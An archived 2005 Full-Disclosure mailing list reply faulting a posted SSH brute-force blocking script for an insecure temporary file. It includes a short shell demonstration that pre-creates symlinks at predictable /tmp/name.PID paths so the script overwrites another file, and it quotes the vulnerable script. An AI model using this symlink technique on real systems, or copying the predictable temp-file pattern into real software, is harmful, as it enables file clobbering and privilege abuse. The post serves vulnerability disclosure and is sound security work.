[Full-disclosure] SSH Bruteforce blocking script
Alejandro Barrera
abarrera at iron-gate.net
Fri Sep 2 09:03:57 BST 2005
Well, we apreciate your script although I would preffer to stay with my nice
bruteforcing attempts than to create an insecure temporary file bug:
ergosum at sparta:~$ cat test.sh
#!/bin/sh
SCRIPT_NAME=$(basename $0)
TMP_FILE="/tmp/${SCRIPT_NAME}.$$"
touch ${TMP_FILE}
echo "pwn3d" > ${TMP_FILE}
exit
ergosum at sparta:~$ cat data
pr0n g0ld collection: ....
ergosum at sparta:~$ ln -s /home/ergosum/data /tmp/test.sh.18359
ergosum at sparta:~$ ln -s /home/ergosum/data /tmp/test.sh.18361
ergosum at sparta:~$ ln -s /home/ergosum/data /tmp/test.sh.18362
ergosum at sparta:~$ ./test.sh
ergosum at sparta:~$ cat data
pwn3d
> #!/bin/ksh
> #
> # ssh_brute_blocker
> #
> # 05/07/2004 15:05 - Michael L. Benjamin
> #
> SCRIPT_NAME=$(basename $0)
> LOG_FILE="/var/log/secure"
> DENY_FILE="/etc/hosts.deny"
> TMP_FILE="/tmp/${SCRIPT_NAME}.$$"
> INBOUND_IP=""
> INLINE=""
> GUESS_COUNT=0
> PERMIT_GUESS=4
> touch ${TMP_FILE}
> while :
> do
> tail -10000 ${LOG_FILE} | grep "Failed password for illegal user" | awk
> -F"from" {'print $2'} | awk {'print $1'} | uniq > ${TMP_FILE}
--
Alejandro Barrera García-Orea
R&D Engineer
c/ Alcala 268 28027 Madrid
Office: +34 91 326 66 11
Fax: +34 91 326 66 11
e-mail: abarrera at iron-gate.net
Full-Disclosure is hosted and sponsored by Secunia.